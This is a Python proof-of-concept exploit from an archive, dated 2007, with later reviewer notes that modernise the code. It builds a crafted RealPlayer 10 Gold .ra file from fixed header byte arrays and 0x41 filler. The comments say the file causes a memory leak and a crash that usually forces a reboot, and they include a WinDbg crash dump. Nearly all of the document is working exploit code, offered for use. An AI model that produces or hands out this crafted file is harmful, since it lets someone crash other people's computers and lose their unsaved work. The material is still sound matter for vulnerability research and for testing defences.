
# Title : RealPlayer 10 (.ra file) Remote Denial of Service Exploit
# Published : 2007-04-30
# Author : n00b


#!/usr/bin/python
###
#*Real player 10 Gold .Ra file remote DoS.
#Credits to n00b for finding this bug
#This bug is a nasty memory leak within
#Real player 10 gold. Please remember, if
#you're going to test it out, save all the info
#you need first, because you will probably have
#to reboot. Also remember all other applications
#will be deprived of page memory, so other
#applications might fail upon execution
###
#Tested: On win xp sp 1 / sp 2.
################################################################################
#Pf usage will go from around 120mb-1.40gb
#I've provided the following debug info also
#What i could collect from the crash dump..
#No vital memory address was overwritten,
#just a nasty memory leak.
################################################################################
#Executable search path is: 
#Windows XP Version 2600 (Service Pack 2) UP Free x86 compatible
#Product: WinNt, suite: SingleUserTS Personal
#Debug session time: Sun Apr 29 13:45:27.000 2007 (GMT-7)
#System Uptime: 0 days 0:47:42.649
#Process Uptime: 0 days 0:01:39.000
################################################################################
#This dump file has an exception of interest stored in it.
#The stored exception information can be accessed via .ecxr.
#(420.4a0): Access violation - code c0000005 (first/second chance not available)
#eax=00000001 ebx=00000000 ecx=00000000 edx=00780764 esi=00785110 edi=6334def8
#eip=632164b5 esp=0012ddc8 ebp=0012dfdc iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200246 
#rput3260+0x64b5:
#632164b5 8b11            mov     edx,dword ptr [ecx]  ds:0023:00000000=????????
################################################################################
#Seems like another memory leak in real-player 10 gold fully patched.
#I'm not relying on the debug info as I had to reboot at crash time
#Vist us at http://blackhat-forums.com/.
################################################################################


import sys
import struct
import time

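# NOTE(review): in the archived listing every "\x" escape had lost its
# backslash, so the original script wrote the ASCII text "x2ex52..." rather
# than the intended header bytes and could not reproduce the author's report.
# The four constants below restore the escapes byte for byte from the listing;
# the Python 2 print statements become print() calls (single-argument form,
# valid on both 2 and 3), the cosmetic time.sleep() pauses between writes are
# dropped, and file creation is moved behind a __main__ guard so importing the
# module has no side effects.

# Banner text reproduced verbatim from the original author.
_BANNER = (
    "#########################################################################",
    "           n00b is credited for find this bug and writing poc.           ",
    "#########################################################################",
    "#                Real player 10 gold .Ra file dos exploit               #",
    "#                      Shouts to every one at milw0rm                   #",
    "#                          =======================                      #",
    "#                            Date :Aprill 29 2007                       #",
    "#                                                                       #",
    "#                Shouts to marsu your doing a excellent job             #",
    "#########################################################################",
    "",
    "Special thanks to str0ke",
    "",
)

# ".RMF" file magic followed by a "PROP" chunk and an "MDPR" media-properties
# chunk (the chunk tags are readable in the bytes: 2e 52 4d 46, 50 52 4f 50,
# 4d 44 50 52). 208 bytes.
Main_Header = (
    b"\x2e\x52\x4d\x46\x00\x00\x00\x12\x00\x01\x00\x00\x00\x00\x00\x00"
    b"\x00\x06\x50\x52\x4f\x50\x00\x00\x00\x32\x00\x00\x00\x00\xfa\x53"
    b"\x00\x00\xfa\x53\x00\x00\x02\xe8\x00\x00\x02\xe8\x00\x00\x00\x3c"
    b"\x00\x00\x10\xe4\x00\x00\x07\x41\x00\x00\xb3\xee\x00\x00\x02\xac"
    b"\x00\x02\x00\x0d\x0a\x4d\x44\x50\x52\x00\x00\x00\xa4\x00\x00\x00"
    b"\x00\x00\x00\xfa\x53\x00\x00\xfa\x53\x00\x00\x02\xe8\x00\x00\x02"
    b"\xe8\x00\x00\x00\x00\x00\x00\x07\x41\x00\x00\x15\xfd\x0c\x41\x75"
    b"\x64\x69\x6f\x20\x53\x74\x72\x65\x61\x6d\x14\x61\x75\x64\x69\x6f"
    b"\x2f\x78\x2d\x70\x6e\x2d\x72\x65\x61\x6c\x61\x75\x64\x69\x6f\x00"
    b"\x00\x00\x56\x2e\x72\x61\xfd\x00\x05\x00\x00\x2e\x72\x61\x35\x66"
    b"\x05\x63\xd7\x00\x05\x00\x00\x00\x46\x00\x0e\x00\x00\x02\xe8\x00"
    b"\x00\xae\x60\x00\x07\x55\x6d\x00\x00\x00\x00\x00\x14\x02\xe8\x00"
    b"\xba\x00\x00\x00\x00\xac\x44\x00\x00\xac\x44\x00\x00\x00\x10\x00"
)

# Second section: a short tag, runs of 0x41 filler and a stretch of
# non-printable bytes. 128 bytes. Runs of 0x41 are written with repetition
# instead of spelled out; the byte values are unchanged.
Mid_Header = (
    b"\x01\x67\x65\x6e" + b"\x41" * 12
    + b"\x41" * 32
    + b"\x41" * 10 + b"\x00" * 6
    + b"\x00\x62\x1f\xc1\x42\x37\xc5\x7f\xd8\xaa\x9b\x59\x89\x0d\x91\xbb"
    b"\xcd\x29\x32\xb4\xb0\xd9\x30\x0f\x05\x08\x5e\x2b\x3f\x60\x23\x43"
    b"\xe2\xf3\x82\x96\x81\xfe\xa4\x83\x8e\x2b\x32\x09\x1a\x21\x1e\xc9"
    b"\x8d\x00" + b"\x41" * 14
)

# 144 bytes of 0x41 filler followed by one 16-byte trailer. 160 bytes.
Junk_Header = (
    b"\x41" * 144
    + b"\x41\x41\x00\x37\xc5\x11\xf2\x37\xc5\x11\xf2\x37\xc5\x11\xf2\x37"
)

# Two "INDX" chunks (49 4e 44 58) closing the file. 84 bytes.
Tail_Header = (
    b"\xc5\x49\x4e\x44\x58\x00\x00\x00\x3e\x00\x00\x00\x00\x00\x03\x00"
    b"\x00\x00\x00\xb4\x2c\x00\x00\x00\x00\x00\x5c\x00\x00\x02\xbe\x00"
    b"\x00\x00\x00\x00\x00\x00\x00\x07\x8c\x00\x00\x3d\xce\x00\x00\x00"
    b"\x14\x00\x00\x00\x00\x0e\xbc\x00\x00\x78\xde\x00\x00\x00\x28\x49"
    b"\x4e\x44\x58\x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x01\x00"
    b"\x00\x00\x00\x00"
)


def print_banner():
    """Print the original author's banner, one line per entry."""
    for line in _BANNER:
        print(line)


def build_ra_file():
    """Return the complete crafted .ra file as bytes.

    This is the concatenation of the four header sections in the order the
    original script wrote them to disk (580 bytes in total).
    """
    return Main_Header + Mid_Header + Junk_Header + Tail_Header


def write_ra_file(path="Realplayerdos.ra"):
    """Write the crafted file to *path* and return the number of bytes written.

    Args:
        path: output filename; defaults to the name the original script used.

    Raises:
        OSError: if the file cannot be opened for writing.
    """
    data = build_ra_file()
    # Single write under a context manager so the handle is closed even if
    # the write fails (the original closed it manually after four writes).
    with open(path, "wb") as out:
        out.write(data)
    return len(data)


def main(path="Realplayerdos.ra"):
    """Entry point: print the banner and create the file in the working directory."""
    print_banner()
    print("Please wait your file is being created")
    write_ra_file(path)
    print("File was created.")


if __name__ == "__main__":
    main()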
